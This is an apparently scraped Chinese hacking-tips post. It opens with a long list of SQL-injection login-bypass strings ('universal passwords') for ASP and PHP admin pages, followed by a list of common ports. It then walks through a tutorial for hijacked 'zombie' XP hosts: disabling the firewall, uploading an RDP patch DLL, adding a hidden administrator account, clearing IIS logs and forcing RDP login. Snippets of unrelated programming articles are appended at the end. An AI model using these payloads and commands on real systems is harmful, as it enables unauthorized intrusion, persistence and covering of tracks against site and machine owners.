万能密码-知识合集

所谓万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站所以称之为万能。
分享给大家、、 希望对大家有所帮助!
asp aspx万能密码
1:"or "a"="a
2:‘.).or.(‘.a.‘=‘.a
3:or 1=1--
4:‘or 1=1--
5:a‘or‘ 1=1--
6:"or 1=1--
7:‘or.‘a.‘=‘a
8:"or"="a‘=‘a
9:‘or‘‘=‘
10:‘or‘=‘or‘

admin‘or 1=1#

PHP万能密码
admin‘/*
密码*/‘

‘or 1=1/*

"or "a"="a
"or 1=1--
"or"="
"or"="a‘=‘a
"or1=1--
"or=or"
‘‘or‘=‘or‘
‘) or (‘a‘=‘a
‘.).or.(‘.a.‘=‘.a
‘or 1=1
‘or 1=1--
‘or 1=1/*
‘or"="a‘=‘a
‘or‘ ‘1‘=‘1‘
‘or‘‘=‘
‘or‘‘=‘‘or‘‘=‘
‘or‘=‘1‘
‘or‘=‘or‘
‘or.‘a.‘=‘a
‘or1=1--
1‘or‘1‘=‘1
a‘or‘ 1=1--
a‘or‘1=1--
or ‘a‘=‘a‘
or 1=1--
or1=1--

通过该工具可以扫描常用的端口和指定的端口是否开放。

常用端口号:
代理服务器常用以下端口:
(1). HTTP协议代理服务器常用端口号:80/8080/3128/8081/9080
(2). SOCKS代理协议服务器常用端口号:1080
(3). FTP(文件传输)协议代理服务器常用端口号:21
(4). Telnet(远程登录)协议代理服务器常用端口:23

HTTP服务器,默认的端口号为80/tcp(木马Executor开放此端口);
HTTPS(securely transferring web pages)服务器,默认的端口号为443/tcp 443/udp;
Telnet(不安全的文本传送),默认端口号为23/tcp(木马Tiny Telnet Server所开放的端口);
FTP,默认的端口号为21/tcp(木马Doly Trojan、Fore、Invisible FTP、WebEx、WinCrash和Blade Runner所开放的端口);
TFTP(Trivial File Transfer Protocol ),默认的端口号为69/udp;
SSH(安全登录)、SCP(文件传输)、端口重定向,默认的端口号为22/tcp;
SMTP Simple Mail Transfer Protocol (E-mail),默认的端口号为25/tcp(木马Antigen、Email Password Sender、Haebu Coceda、Shtrilitz Stealth、WinPC、WinSpy都开放这个端口);
POP3 Post Office Protocol (E-mail) ,默认的端口号为110/tcp;
WebLogic,默认的端口号为7001;
Webshpere应用程序,默认的端口号为9080;
webshpere管理工具,默认的端口号为9090;
JBOSS,默认的端口号为8080;
TOMCAT,默认的端口号为8080;
WIN2003远程登陆,默认的端口号为3389;
Symantec AV/Filter for MSE ,默认端口号为 8081;
Oracle 数据库,默认的端口号为1521;
ORACLE EMCTL,默认的端口号为1158;
Oracle XDB( XML 数据库),默认的端口号为8080;
Oracle XDB FTP服务,默认的端口号为2100;
MS SQL*SERVER数据库server,默认的端口号为1433/tcp 1433/udp;
MS SQL*SERVER数据库monitor,默认的端口号为1434/tcp 1434/udp;
QQ,默认的端口号为1080/udp

XP下双开3389的教程

用到的工具有

xp3389.exe termsrvhack.dll 3389.bat 这么几个文件

首先关他的防火墙

就在这里面输入 net stop sharedaccess 再回车就OK了

现在我们先把xp3389.exe termsrvhack.dll这2个文件传个肉鸡 3389.bat这个要修该后再传的

再运行它。看操作
OK! the Tsenabled成功
再输入Tasklist/SVC >>c:\3389.txt

再肉鸡里面找到3389.txt文件本地打开DcomLaunch, TermService 把这些英文前面的数字记下来

然后返回本地找到 3389.bat

右键编辑 把原来的覆盖掉 保持OK 再传给肉鸡 并运行他

已经OK了。好我们看下能不能连接

1:net stop sharedaccess(关掉防火墙命令)
2:Tasklist/SVC >>c:\3389.txt
3:net user 1 1 /add 意思是建立一下用户名为1密码也为1的用户
4:net localgroup administrators 1 /add 把1这个用户提升为管理员权限

日志位于/windows/system32/logfiles/w3svc1目录下!
主要原因:
C:\WINDOWS\system32\LogFiles文件夹下为系统日志统计文件,文件系统并不自动删除。
处理方法:对日志文件进行合理的清理。
清理方法如下:
找到c:/winnt/system32/logfiles/w3svc1目录下的文件,队保留最近的几个日志外,清理干净就可以了!!
FTP日志默认位置:%systemroot%\system32\logfiles\msftpsvc1\,默认每天一个。
WWW日志默认位置:%systemroot%\system32\logfiles\w3svc1\,默认每天一个日志。

强制登陆3389
mstsc /admin /v:IP:端口

时间: 2024-10-24 20:50:19

万能密码-知识合集的相关文章

电商交易背景知识合集第一季

郑昀编纂 基于网络资料 创建于2015/9/7 最后更新于2015/9/7 特别感谢知乎梁川.天顺等知乎网友的精彩答案 本文档适用人员:交易领域的产品研发人员 提纲: 银联 一些错综复杂的关系 银联是什么 银联商务是什么 快捷支付绕过银联了吗 能通过卡号判断是对公账户或对私账户吗 快捷支付 为什么要推快捷支付 POS POS签单上的各种号码 信用卡刷卡后都发生了什么 第三方支付公司 为什么需要有备付金 直联网关和间联网关 何谓银企直连 支付宝是怎么对账的 我们作为商户如何接入 预付费卡牌照与第三

java并发知识合集(前置知识——java内存模型)

JMM规范: 一.概念:规范了java虚拟机与计算机内存如何协同工作,它规定了一个线程如何和何时可以看到其他线程修改过的共享变量的值,以及在必须时如何同步地访问共享变量. 备注:如果两个线程同时调用了同一个对象的同一个方法,他们都会访问这个对象的成员变量,此时这个两个线程拥有的只是这个对象的私有拷贝. 如图: 二.八种同步操作 1.luck(锁定):作用于主内存的变量,它把一个变量标示为一条线程独占的状态. 2.unlock(解锁):作用于主内存的变量,它把一个处于锁定状态的变量释放出来,释放后

Android知识合集

1.Intent(意图) 显式意图:调用Intent.setComponent()或Intent.setClass()方法明确指定组件名, 明确指定了Intent应该传递给哪个组件. 隐式意图:没有明确指定组件名,android系统根据隐式意图中设置的动作(action). 类别(category).数据(Uri和数据类型)找最合适的组件来处理. 2.android textview内容超长滚动视图 1.首先xml文件TextView配置 <TextView android:id="@+i

Java知识合集

1.认识类声明的区别 使用"public class 类名称"声明一个类时,类名称必须与文件名称一致,否则程序无法编译; 使用"class 类名称"声明一个类时,类名称可以与文件名称不一致,但是在执行时一定要执行生成后的*.class, 例如:TestClass.java文件声明类为Demo,执行为Demo.class; 在一个java文件中可以有多个类的定义,但只要一个public class声明的类; Java命名规则,类的定义,类名称中每个单词的首字母必须大写

python小知识合集

前言 学习过程中难免会遇到问题,将所遇到的一些小问题解决并整理起来.就像写日记一样的来写这篇博客. 变量存储 python中当数据存储所需要的内存不大时,python为了节省内存对于值一样的变量只开辟一块内存,也就是说两个变量公用同一个内存地址.对于list.tuple.dict.set这一类数据类型比str.int.float这些数据类型存储所需要的内存更大,就算元素为空,值一样的变量也会一一开辟一块内存来存储数据. 字符串中那些细节 字符串拼接的“+”已经在数据类型篇说过了,万恶的“+”.

iOS知识合集

一.多线程开发的理解以及iOS中有几种实现多线程的方法? 好处: 1.使用线程可以把程序中占据时间长的任务放到后台去处理,如图片.视频的下载: 2.发挥多核处理器的优势,并发执行让系统运行的更快.更流畅,用户体验更好. 缺点: 1.大量的线程降低代码的可读性: 2.更多的线程需要更多的内存空间: 3.当多个线程对同一个资源出现争夺的时候要注意线程安全的问题. iOS有三种多线程编程的技术: 1.NSThread(两种创建方式)[NSThread detachNewThreadSelector:@

OO先导课——JAVA初见懵的知识合集

常见操作 数组 //声明 *数组也是对象,长度是一个属性 int[] i=new int[5]; int[] i={0,1}; String[] str=new String[5];//字符串数组,双引号,与char字符数组区分 String[] str={"a","b"}; //求长度 数组在起始的时候,长度就 已经确定了(只是一个属性,'\0'没用)//参考:http://www.cnblogs.com/entry-android/p/5539362.htmln

MYSQL数据库相关知识合集

1  MYSQL取得某一范围随机数: 关键词:RAND() [产生0~1之间的随机数] mysql> SELECT RAND( ), RAND( ), RAND( ); +------------------+-----------------+------------------+ | RAND( ) | RAND( ) | RAND( ) | +------------------+-----------------+------------------+ | 0.4546458492564

三、Java基础知识要点合集

1.数据类型 Java的数据类型分为基本数据类型和引用数据类型. a, 基本数据类型包括:byte, boolean, char, short, int, long, float, double; b, 每个基本数据类型都有相应的引用类型,比如int  ->  Integer,char -> character. c, 查询不同类型数据的范围,方法之一是可以用基本类型对应的引用类型.比如,"int i = Integer.Size; "(i表示int型数据所占的位(bit)